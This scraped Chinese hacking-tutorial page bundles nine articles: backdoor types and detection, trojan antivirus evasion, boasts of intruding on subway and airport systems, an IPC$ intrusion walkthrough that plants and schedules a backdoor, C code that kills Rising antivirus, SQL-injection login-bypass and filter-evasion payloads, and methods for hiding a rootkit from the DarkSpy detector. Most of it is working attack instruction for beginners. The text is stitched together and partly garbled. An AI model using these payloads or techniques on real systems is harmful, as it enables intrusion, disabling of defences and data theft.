当前位置：首页 > 实用文档 > 其他范文> 有关后门的知识详解武林安全网

有关后门的知识详解武林安全网

时间：2023-04-02 08:05:15 其他范文收藏本文下载本文

有关后门的知识详解武林安全网（精选9篇）由网友“小猫Iris”投稿提供，下面是小编为大家推荐的有关后门的知识详解武林安全网，欢迎阅读，希望大家能够喜欢。

有关后门的知识详解武林安全网

篇1：有关后门的知识详解武林安全网

在网络上常见的对“后门”的解释，其实我们可以用很简单的一句话来概括它：后门就是留在计算机系统中，供某位特殊使用都通过某种特殊方式控制计算机系统的途径!!——很显然，掌握好后门技术是每个网络安全爱好者不可或缺的一项基本技能!它能让你牢牢抓住肉鸡，让它永远飞不出你的五指山!

正因如此所以后门技术与反后门的检测技术也成为了功防战的焦点，正所谓知己知彼，百战不殆。要了解反后门技术那么我们就要更多的深入去学习与了解后门知识。

后门的分类

后门可以按照很多方式来分类，标准不同自然分类就不同，为了便于大家理解，我们从技术方面来考虑后门程序的分类方法：

前面讲了这么多理论知识是不是觉得有点头大了呢？下面我们来讲讲一些常见的后门工具吧

1.网页后门

此类后门程序一般都是服务器上正常的web服务来构造自己的连接方式，热缦衷诜浅A餍械ASP、cgi脚本后门等。

典型后门程序：海洋顶端，红粉佳人个人版，后来衍生出来很多版本的这类网页后门，编写语言asp,aspx,jsp,php的都有种类比较繁多。

2.线程插入后门

利用系统自身的某个服务或者线程，将后门程序插入到其中，这种后门在运行时没有进程,所有网络操作均播入到其他应用程序的进程中完成。

典型后门程序：代表BITS，还有我在安全焦点上看到的xdoor（首款进程插入后门）也属于进程插入类后门。

3.扩展后门

所谓的扩展后门，在普通意义上理解，可以看成是将非常多的功能集成到了后门里，让后门本身就可以实现很多功能，方便直接控制肉鸡或者服务器，这类的后门非常受初学者的喜爱，通常集成了文件上传/下载、系统用户检测、HTTP访问、终端安装、端口开放、启动/停止服务等功能，本身就是个小的工具包，功能强大。

典型后门程序：Wineggdroup shell

4.C/S后门

这个后门利用ICMP通道进行通信，所以不开任何端口，只是利用系统本身的ICMP包进行控制安装成系统服务后，开机自动运行，可以穿透很多防火墙——很明显可以看出它的最大特点：不开任何端口~只通过ICMP控制!和上面任何一款后门程序相比，它的控制方式是很特殊的，连80端口都不用开放，不得不佩服务程序编制都在这方面独特的思维角度和眼光.

典型后门程序：ICMP Door

5.root kit

好多人有一个误解，他们认为rootkit是用作获得系统root访问权限的工具。实际上，rootkit是攻击者用来隐藏自己的踪迹和保留root访问权限的工具。通常，攻击者通过远程攻击获得root访问权限，或者首先密码猜测或者密码强制破译的方式获得系统的访问权限。进入系统后，如果他还没有获得root权限，再通过某些安全漏洞获得系统的root权限。接着，攻击者会在侵入的主机中安装rootkit，然后他将经常通过rootkit的后门检查系统是否有其他的用户登录，如果只有自己，攻击者就开始着手清理日志中的有关信息。通过rootkit的嗅探器获得其它系统的用户和密码之后，攻击者就会利用这些信息侵入其它的系统。

典型后门程序：hacker defender

以上是我在网上搜集的前人总结，值得指出的是这些分类还不够完善，还没有真正指出后门的强大。

下面我继续补充点我更新黑基技术文章时看到的一些比较少见的后门技术，

6 BootRoot

通过在Windows内核启动过程中额外插入第三方代码的技术项目，即为“BootRoot”。国外组织eBye在通过这种新的Rootkit启动技术，并赋予这种无需依赖Windows内核启动过称去加载自身代码的技术及其衍生品——“BootKit”，即“Boot Rootkit”。

Mebroot是如何实现MBR感染与运作的

Mebroot比Windows还要早一步启动，然后将自身驱动代码插入内核执行，从而绕过了注册表HIVE检测的缺陷。同时采用的底层技术让大部分Anti-Rootkit工具失明——因为它根本没有在系统内留下任何启动项目。检测工具自然会检测失效。然后通过DLL远程注入用户进程，为系统打开后门并下载木马运行。在这非传统的渗透思路下，反Rootkit工具是无法根除它的。

看到以上这么多可怕的后门知识是不是对这些有所了解了呢？

下面我们来谈谈如何检测后门

1.简单手工检测法

凡是后门必然需要隐蔽的藏身之所，要找到这些程序那就需要仔细查找系统中每个可能存在的可疑之处，如自启动项，据不完全统计，自启动项目有近80多种。

用AutoRuns检查系统启动项。观察可疑启动服务，可疑启动程序路径，如一些常见系统路径一般在system32下，如果执行路径种在非系统的system32目录下发现

notepad

System

smss.exe

csrss.exe

winlogon.exe

services.exe

lsass.exe

spoolsv.exe

这类进程出现2个那你的电脑很可能已经中毒了。

如果是网页后门程序一般是检查最近被修改过的文件，当然目前一些高级webshell后门已经支持更改自身创建修改时间来迷惑管理员了。

2.拥有反向连接的后门检测

这类后门一般会监听某个指定断口，要检查这类后门需要用到dos命令在没有打开任何网络连接页面和防火墙的情况下输入netstat -an 监听本地开放端口，看是否有本地ip连接外网ip。

3.无连接的系统后门

如shift，放大镜，屏保后门，这类后门一般都是修改了系统文件，所以检测这类后门的方法就是对照他们的MD5值如sethc.exe（shift后门）正常用加密工具检测的数值是

MD5 : f09365c4d87098a209bd10d92e7a2bed

如果数值不等于这个就说明被篡改过了。

4.CA后门

CA克隆帐号这样的后门建立以$为后缀的超级管理员在dos下无法查看该用户，用户组管理也不显示该用户，手工检查一般是在sam里删除该帐号键值。当然要小心，没有经验的建议还是用工具。当然CA有可能克隆的的是guest用户，所以建议服务器最好把guest设置一个复杂密码。

5.对于ICMP这种后门

这种后门比较罕见，如果真要预防只有在默认windows防火墙中设置只允许ICMP传入的回显请求了。

篇2：详解常用的木马隐身术武林安全网

一、对木马使用花指令

花指令就是指程序中包括了跳转指令及一些无用的指令在内的汇编指令段，有加区加花和去头加花两种，通常是用来改变程序的入口点或打乱整个程序的顺序，而一些杀毒软件在进行木马查杀工作时，都是按从程序的开头到结尾的顺序进行检测的，以此来找到与病毒库中某一特征码相似的特征。甚至一些杀毒软件就是以程序的入口点作为特征码的。因此，如果木马的程序顺序被打乱，或者程序的入口点被修改，那么，杀毒软件也就很难检测出它来，于是就达到了隐身的目的。能完成这些工作的，就是在木马程序中使用花指令。

要在木马程序中使用花指令，可以有两种方式，一种是使用互联网上现成的，另一种是攻击者自己编写或者使用花指令生成软件。由于互联网上现成的花指令同样会被杀毒软件厂商所得到，因此不会有什么好的保护效果。对于有一定汇编技术的攻击者来说，就会使用自己编写花指令的方式，还可以使用一些花指令生成软件，如超级加花器和花蝴蝶等。

正是由于给木马添加不易被检测到的花指令需要高超的编程技术，也就很少有普通的攻击者使用这种方式，至少在没有陌生的花指令生成软件出现之前，是不太喜欢使用它的。

并且，由于对木马使用花指令也只是对其可执行文件本身有效，当其加载至内存后，这种隐身方式将失去作用。因此，使用具有内存查杀功能的杀毒软件，就能够非常容易地检测到只使用这种隐身方式的木马病毒的。

在当前具有内存查杀功能的安全软件之中，查杀花指令保护木马比较好的就是EWIDO了。也可以使用Ollydbg程序先将木马加入到内存中后再查杀。同时，还可以使用像“花指令清除器”一类的花指令检测软件，来识别和除去花指令。

二、终止安全软件进程

现在，几乎所有的木马都在使用一种十分有效的、躲避安全检测软件的方法，就是终止系统中所有安全软件的进程，从而达到了不会被查杀的目的。

而要实现这种功能，只要木马能够枚举系统中的所有正在运行的进程，然后从中找到匹配的安全软件进程名，通过发送一个终止进程的Windows消息给它，就可以结束这些正在运行的安全软件，

还可以通过挂起安全软件的所有子进程，以此来冻结其父进程。或者通过查找并修改安全软件已经加载在内存中的代码，让安全软件的进程崩溃而退出运行。

有时，为了防止由于终止安全软件进程而引起计算机用户的注意，会在系统任务栏的托盘区产生与安全软件图标相似的图标来欺骗用户，以此来延长在系统中存活的时间。所有的种种，都是为了达到不被查杀的目的。

要防范这种方式的木马攻击。首先，杀毒软件等安全软件本身要已经具有忽略来自系统结束任务消息的功能，以防止通过Windows消息来结束安全运行进程的攻击。另外，最好的方法就是系统用户自己在平时使用计算机过程当中，要不断查看系统中安全软件或其它进行的运行情况，一旦发现原本开机启动的安全软件没有运行或启动不了，就应该怀疑是否已经有木马在系统中运行了。此时，应当检测系统中所有正在运行的进程是否有可疑的，例如使用IceSword和ProceXP这两款软件来检测，或通过查看系统日志来发现可疑问题。

三、修改安全软件的配置文件

每一个安全软件，都会将它的安全设置放入到一个配置文件当中，然后在每次系统启动时读取这个文件，并以这个文件中的设置内容来设置保护方式。这些配置文件，对于单机版的安全软件来说，一般都是保存在用户系统硬盘当中的某个位置的。因此，在系统中运行的木马程序也是可以获得这些安全软件的配置文件的，然后就可以对这些文件中的配置内容进行修改。例如修改防火墙对所有的程序都放行，修改杀毒软件在任何时候都不进行系统扫描检测。这样就能躲避杀毒软件，又能穿过防火墙与攻击者进行网络连接。

但是，对于这些配置文件，安全软件也是会对它们进行加密的。因此，要修改这些配置文件也不是那么容易就实现的。不过，木马还是会通过一些方法来完成修改安全软件配置文件的任务的。例如进行反向连接，然后由攻击者通过远程控制修改安全软件的设置。还可以通过对安全软件已经加载到内存中与配置相关的位置进行填充或修改等等。尤其是对于哪些将安全设置项写入到注册表中的，要修改就更加容易一些了。不过，攻击者不会常用这种方式，毕竟实现起来比其它要麻烦得多。

要防止这种木马攻击，使用主动防御型杀毒软件(如Mcafee)和防火墙( 如Tiny Firewall)，能达到一定的预防效果。还可以使用Filemon和Regmon软件对系统文件和注册表进行监控，以此来提醒用户有某种非法文件修改行为在发生，以及哪些文件和注册表项被修改了。

篇3：物理渗透技术介绍武林安全网

当外出的时候，N810做侦查工作，具体深层次的渗透，还是要靠x86架构的机器，来跑windows或者linux，这样才是最有效率的，像上面这台三星Q1U，可以运行完整的windows及linux，软件环境是完善的，想要以一部手机进行完全入侵的想法至少在现阶段是没那么靠谱的，科技在发展，什么时候系统，硬件及电池续航都达到一个平均值的时候，那才是最完美的设备出现之时，

谈到设备，原来在milsec发给帖子，谁知被影子猪那厮在删除论坛的时候一块搞没了，那时候我也没备份，郁闷的我够呛，现在想开了，再写一下吧..

首先，对于喜欢户外渗透的人，我想都是比较接近所谓的本质的人，因为户外渗透的接触到的目标往往都是物理设备，黑掉物理设备带来的效果是最能让你满足的，比如把某某地铁广告系统正在播放的广告替换了，还比如之前我渗透过得地铁、机场等基础设施，搞完都是很有成就感的，所以国内外还是有一大片人对这个感兴趣，也想去自己试一试，所以我也说说..

设备上，我建议是资金允许的情况下，5寸-7寸的UMPC(Ultra Mobile PC)，因为UMPC的架构多数是x86，对软件环境给予了绝对的支持，想用win或linux随你，双系统也是可以的。5寸的多半是平板，比如viliv S5，这种设备没有键盘，都是靠屏幕键盘，如果你想在渗透时候允许linux，或许就会碰到麻烦了，不过可以考外接键盘来实现，但是这样就又违背了便携的概念，虽说OQO也有5寸且有硬键盘的UMPC，但是价格昂贵，爱国者的5寸也是昂贵，而且配置很一般，所以不推荐，

7寸的UMPC，viliv S7，samsung q1u或者sony的UX系列，这些机身都自带硬键盘，而且屏幕尺寸还没用达到上网本的8.9-10寸标准，还算是比较便携，基本一个小包就能到处走了，而且这些价格都不到5k，硬件配置用作渗透的话足够，所以推荐。

补充一下关于不选用上网本的原因，这东西终究是个需要放在腿上或桌子上的东西，户外渗透时，没有多少环境能给你提供如此安逸的状态，使用上网本会让你很不随意，更会招来被围观或者被人鄙视为装B的情况...

除了体积、架构考虑，电池续航也是一个重要的因素，选择设备的时候，对备用电池的考虑也是必须得，像上面所说，viliv s5、s7，这俩一开始就以高续航为卖点，而且厂商很人性化，提供备用电池和座充等产品，价格也都是可以接受的范围，三星的q1u，虽然厂商销售的电池价格昂贵，但是taobao上还是可以搜到许多销售q1u备电的商家，所以选好中意的设备后，也要对该设备电池的供应有所了解，毕竟这东西是个消耗品，万一花大价钱买了个设备，没用多久电池不行了，又买不到替换，那就辶..

最重要的一点就是，如果真喜欢户外渗透，就请随时带着你的设备，因为你永远不可能知道你会碰到什么样的网络环境，如果碰到了，而你又恰恰没有带设备，错过了一次积累经验的好机会，那是很痛苦的，我是深有体会..像我这种宅男很多地方只会去一次，但我去的很多地方都可以搞..至少我认为..

不过我很懒，总是忘带家伙...

篇4：教菜鸟如何攻击139端口武林安全网

首先，连接的命令是：

net<空格>use<空格>\\IP地址\ipc$Content$lt;空格>密码<空格>/user:用户名

假设我要连接的目标IP地址是：192.168.1.11，用户名是google,使用的密码是123456,那么连接对方139端口通道的格式就是这样的：

net use \\192.168.1.11\ipc$Content$nbsp;123456 /user:google 如果连接成功，那么系统会提示“命令成功完成”!

空密码是这样的：

如果密码是空的，那就在原先输入密码的地方以“”代替，

开始查看权限：

查看登录后用户权限的方法很简单，只要给目标系统传个文件就可以了，如果传诵成功，那么一般都是系统管理员权限了，如果不成功可能就是来访者权限或者其他用户组的。命令的格式是这样的：

copy文件绝对路径\\IP地址\文件目标路径

比如我要将本地C盘下的a.exe文件拷贝到192.168.1.11的D盘下：

copy c:\a.exe \\192.168.1.11\d$Content$nbsp;

要注意“$”符，那是隐藏共享盘的表示符，如果对方的共享盘不是隐藏的，就不需要“$”符了。如果命令执行成功，系统同样会提示“已复制 1 个文件”

小技巧：

再次复制相同文件至相同路径，以检测是否存在杀毒软件！！！

如果系统提示“改写 \\192.168.1.11\d$\a.exe 吗? (Yes/No/All):”则说明文件在还在目标系统上，没有被杀毒软件查杀（一般发送过去的都是后门程序只类的东西，只有系统安装了杀毒软件都会被杀掉），

如果没有提示，则说明安装了杀毒软件。

查看目标系统时间，准备使用at任务计划运行程序。

命令格式：

net<空格>time<空格>\\IP地址

例子：

net time \\192.168.1.11

系统会返回目标的当前时间，时间显示后，AT任务计划命令需要使用24小时制。比如系统显示“\\192.168.1.11 的当前时间是 /5/10 下午 06:02”在使用到AT任务计划命令时，这个“下午06：02”就需要换算成“18：02”！

使用AT命令为目标系统添加任务计划：

格式：

at<空格>\\IP地址<空格>指定运行时间<空格>需要运行的文件路径名

例子：

at \\192.168.1.11 18:20 d:\a.exe

IPC通道入侵就目前来看已经是一个非常老的攻击手段了，现在针对IPC通道的防御手段也越来越多，越来越简单。但如果一个攻击者成功获得了IPC通道的一个System权限，那对于被攻击的系统来说无意是致命的。

所以，建议用户将Server服务关闭,信使服务与Task Scheduler服务（计划任务）也都关闭，这样可以较全面的保护计算机在IPC通道方面的安全。

篇5：干掉瑞星的代码（瑞星漏洞）武林安全网

编写成程序后双击运行即可直接K掉瑞星（重起也没用）

以下是漏洞利用代码

------------------------------------------------------------------------------

DWORD GetProcessIdFromName(LPCTSTR name)

{

PROCESSENTRY32 pe;

DWORD id = 0;

HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe.dwSize = sizeof(PROCESSENTRY32);

if( !Process32First(hSnapshot,&pe) )

return 0;

{

pe.dwSize = sizeof(PROCESSENTRY32);

if( Process32Next(hSnapshot,&pe)==FALSE )

break;

if(strcmp(pe.szExeFile,name) == 0)

{

id = pe.th32ProcessID;

break;

}

} while(1);

CloseHandle(hSnapshot);

return id;

}

DWORD GetProcessID(char *FileName)

{

HANDLE myhProcess;

PROCESSENTRY32 mype;

BOOL mybRet;

//进行进程快照

myhProcess=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); //TH32CS_SNAPPROCESS快照所有进程

//开始进程查找

mybRet=Process32First(myhProcess,&mype);

//循环比较，得出ProcessID

while(mybRet)

{

if(strcmp(FileName,mype.szExeFile)==0)

return mype.th32ProcessID;

else

mybRet=Process32Next(myhProcess,&mype);

}

return 0;

}

void killProcess(CString www ,LPCTSTR name,char *xyz)

{

DWORD nPid = 0;

HANDLE hProcess;

DWORD nExitCode = 0;

DWORD nAddress = 0x1000;

nPid=GetProcessIdFromName(name);

hProcess = OpenProcess (PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION, 0,nPid);

WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);

while ( nAddress <= 0x7FFFF000 )

{

GetExitCodeProcess(hProcess, &nExitCode);

if (nExitCode != STILL_ACTIVE)

{

break;

}

WriteProcessMemory(hProcess,(LPVOID)0x0047EB17,&nPid,1,NULL);

VirtualFreeEx(hProcess, (LPVOID)nAddress, 0, 0x8000);

nAddress += 0x1000;

}

篇6：教你躲过验证随意登陆武林安全网

最近有网友提到一种新的万能登陆密码，比如网上有很多这样的登陆验证代码：

程序代码

username=trim(Request.Form(“username”))

password=trim(Request.Form(“password”))

sql=“Select * FROM admin Where user='”&username&“'”

Set rs=Server.CreateObject(“adodb.recordset”)

rs.Open sql,conn,1,1

if rs.eof then

checksysUser=FALSE

else

passwd=trim(rs(“pwd”))

if passwd=password then

Session(“admin”)=username

checksysUser=TRUE

else

checksysUser=FALSE

end if

End if

rs.close

conn.close

if checksysUser=true then

Response.Redirect(“main.asp”)

else

errmsg=“用户名输入有误，请重新输入！”

end if

先在数据库中查询用户名对应的密码，然后再和用户输入的密码对比，导致'or'='or'这样的万能登陆密码失效，

但如果在上面的程序中，用户名输入程序代码

' UNION Select 1,1,1 FROM admin Where ''='

，密码输入1，就可以登陆成功，原理很简单，就不多说了。

顺便附上oldjun的语句：

程序代码

' UNION Select 1,1,1 AS pwd FROM admin Where ''='

篇7：菜鸟的基本网络命令武林安全网

1.最基本，最常用的，测试物理网络的

ping 192.168.0.8 －t ，参数－t是等待用户去中断测试

2.查看DNS、IP、Mac等

A.Win98：winipcfg

B.Win以上：Ipconfig/all

C.NSLOOKUP：如查看河北的DNS

C:\>nslookup

Default Server: ns.hesjptt.net.cn

Address: 202.99.160.68

>server 202.99.41.2 则将DNS改为了41.2

>pop.pcpop.com

Server: ns.hesjptt.net.cn

Address: 202.99.160.68

Non-authoritative answer:

Name: pop.pcpop.com

Address: 202.99.160.212

3.网络信使

Net send 计算机名/IP * (广播) 传送内容，注意不能跨网段

net stop messenger 停止信使服务，也可以在面板－服务修改

net start messenger 开始信使服务

4.探测对方对方计算机名，所在的组、域及当前用户名（追捕的工作原理）

ping －a IP －t ，只显示NetBios名

nbtstat -a 192.168.10.146 比较全的

5.netstat -a 显示出你的计算机当前所开放的所有端口

netstat -s -e 比较详细的显示你的网络资料，包括TCP、UDP、ICMP 和 IP的统计等

6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址

arp -a

7.在代理服务器端

捆绑IP和MAC地址，解决局域网内盗用IP！：

ARP －s 192.168.10.59 00 －50－ff－6c－08－75

解除网卡的IP与MAC地址的绑定：

arp -d 网卡IP

8.在网络邻居上隐藏你的计算机

net config server /hidden:yes

net config server /hidden:no 则为开启

9.几个net命令

A.显示当前工作组服务器列表 net view，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表，

比如：查看这个IP上的共享资源，就可以

C:\>net view 192.168.10.8

在 192.168.10.8 的共享资源

资源共享名类型用途注释

--------------------------------------

网站服务 Disk

命令成功完成，

B.查看计算机上的用户帐号列表 net user

C.查看网络链接 net use

例如：net use z: \192.168.10.8\movie 将这个IP的movie共享目录映射为本地的Z盘

D.记录链接 net session

例如: C:\>net session

计算机用户名客户类型打开空闲时间

-------------------------------------------------------------------------------

\192.168.10.110 ROME Windows 2000 2195 0 00:03:12

\192.168.10.51 ROME Windows 2000 2195 0 00:00:39

命令成功完成。

10.路由跟踪命令

A.tracert pop.pcpop.com

B.pathping pop.pcpop.com 除了显示路由外，还提供325S的分析，计算丢失包的％

11.关于共享安全的几个命令

A.查看你机器的共享资源 net share

B.手工删除共享（可以编个bat文件，开机自运行，把共享都删了！）

net share c$ /d

net share d$ /d

net share ipc$ /d

net share admin$ /d

注意$后有空格。

C.增加一个共享：

c: et share mymovie=e:\downloads\movie /users:1

mymovie 共享成功。

同时限制链接用户数为1人。

12.在DOS行下设置静态IP

A.设置静态IP

CMD

netsh

netsh>int

interface>ip

interface ip>set add “本地链接” static IP地址 mask gateway

B.查看IP设置

interface ip>show address

Arp

显示和修改“地址解析协议 (ARP)”缓存中的项目。ARP 缓存中包含一个或多个表，它们用于存储 IP 地址及其经过解析的以太网或令牌环物理地址。计算机上安装的每一个以太网或令牌环网络适配器都有自己单独的表。如果在没有参数的情况下使用，则 arp 命令将显示帮助信息。

语法

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

篇8：的绕过防注入技巧武林安全网

1、运用字符串判断代替

用经典的or 1=1判断绕过,如or 'swords' ='swords'，这个方法就是网上在讨论的，

必备的绕过防注入技巧武林安全网

。

2、通过空格绕过

如两个空格代替一个空格，用Tab代替空格等，或者删除所有空格，如

or' swords' =‘swords'，由于mssql的松散性，我们可以把or 'swords' 之间的空格去掉，并不影响运行。

3、运用编码技术绕过

如URLEncode编码，ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31，而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。

4、通过类型转换修饰符N绕过

可以说这是一个不错的想法，他除了能在某种程度上绕过限制，而且还有别的作用，大家自己好好想想吧。关于利用，如or 'swords' = N' swords' ，大写的N告诉mssql server 字符串作为nvarchar类型，它起到类型转换的作用，并不影响注射语句本身，但是可以避过基于知识的模式匹配IDS。

5、通过+号拆解字符串绕过

效果值得考证，但毕竟是一种方法。如or 'swords' =‘sw' +' ords' ；EXEC(‘IN' +' SERT INTO '+' …..' )

6、通过LIKE绕过

以前怎么就没想到呢？如or'swords' LIKE 'sw'！！！显然可以很轻松的绕过“=”“>”的限制……

7、通过IN绕过

与上面的LIKE的思路差不多,如or 'swords' IN ('swords')

8、通过BETWEEN绕过

如or 'swords' BETWEEN 'rw' AND 'tw'

9、通过>或者<绕过>

or 'swords' >'sw'

or 'swords' < 'tw'

or 1<3

……

10、运用注释语句绕过

用/**/代替空格，如：union select /**/user，pwd，from tbluser

用/**/分割敏感词，如：U/**/ NION /**/ SE/**/ LECT /**/user，pwd from tbluser

11、用HEX绕过，一般的IDS都无法检测出来

0x730079007300610064006D0069006E00 =hex(sysadmin)

0x64006F006F0077006E0065007200 =hex(db_owner)

篇9：教你如何对抗反入侵工具武林安全网

DarkSpy是由CardMagic和wowocock编写的anti-rootkit反入侵不错的工具，

教你如何对抗反入侵工具武林安全网

。因为正在写的本科毕设与检测rootkit有关，所以这几天分析一下，看有什么可利用的。分析进行得比较顺利，因为DarkSpy里面所采用的技术多数Internet上已经见过，不过肯定有一些创意的哦。

先说说里面的新东西：驱动开发网站的一位会员启发我们DarkSpy修改了

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager中的

GlobalFlag为0x4000，这是做什么呢？原来这会使得NtGlobalFlag加入Maintain

Object Typelist标志，于是系统创建对象时会把它加入Type链表中，这样可以遍历链表来查找对象。修改标志需要重启机器，这应该就是“强模式”要重启的理由。正如那位会员所说，作者故意隐瞒了这点，我也觉得不妥：如果是为了防止别人crack，也应该提供卸载程序的，因为这个标志一直不被清除，不再使用DarkSpy的用户依然会为此付出代价：每个内核对象都要额外分配16字节的核心空间，那成千上万的对象呢?

这个技巧对DKOM来说比较weak了，用下面的代码清除：

VOID

ClearObjectCreatorInfo(

PVOID Object

)

{

POBJECT_HEADER bjectHeader = OBJECT_TO_OBJECT_HEADER(Object);

POBJECT_HEADER_CREATOR_INFO CreatorInfo =

OBJECT_HEADER_TO_CREATOR_INFO(ObjectHeader);

if (CreatorInfo != NULL)

{

RemoveEntryList(&CreatorInfo->TypeList);

InitializeListHead(&CreatorInfo->TypeList);

}

传入处理的对象就脱链了，

这几行代码可让“强模式”失效。

下面简单说说击破的法门：

一、驱动：

DarkSpy1.0.3版及以前很简单，学习Futo rootkit断开PsLoadedModuleList，再将驱动对象传入上面的ClearObjectCreatorInfo，不论“强模式”还是“弱模式”均搞定。DarkSpy1.0.4版有了修改，不过依旧是查找DriverObject，在适当的时候清理掉就可以了，比如可以walkkernel object tree，还有更简单的办法:)

二、进程：

DarkSpy的进程功能把好多东西堆到一起来恶心rootkit的作者们，怎么样，被恶心到了吧？虽

然里面的技术可能不新鲜，但是这么一组合，难以全部清除的。下面把隐藏需要做的事列举列举：

1、PspCidTable就学futo抹掉；

2、进程、线程对象传入ClearObjectCreatorInfo；

3、它还使用csrss里的进程句柄，直接到csrss进程里ZwClose掉最简单；

4、DarkSpy在我的机器崩溃过，分析dump，原来与杀软冲突：它也hook了SwapContext，不好办？

恢复不就行了。恢复时机很重要，相信你也能想到不错的。说说我的思路：在任一条call SwapContext之前的路径上下hook，hook的程序什么也不做，专门检查SwapContext，被改则改回去，这是很通用的做法，它要是hook别的地方也一样搞定。

5、还有一个由线程到进程的，自己去发掘吧，也该动动手么...嘿嘿。

最后可以完全隐藏自己的进程，不过你累不累，什么东西非有进程才能做，没进程就不能做？都核心驱动了...感觉真没必要。

三、文件：

据说是Create IRP，嘿嘿，不过我还没学文件系统驱动，那位大虾补充吧。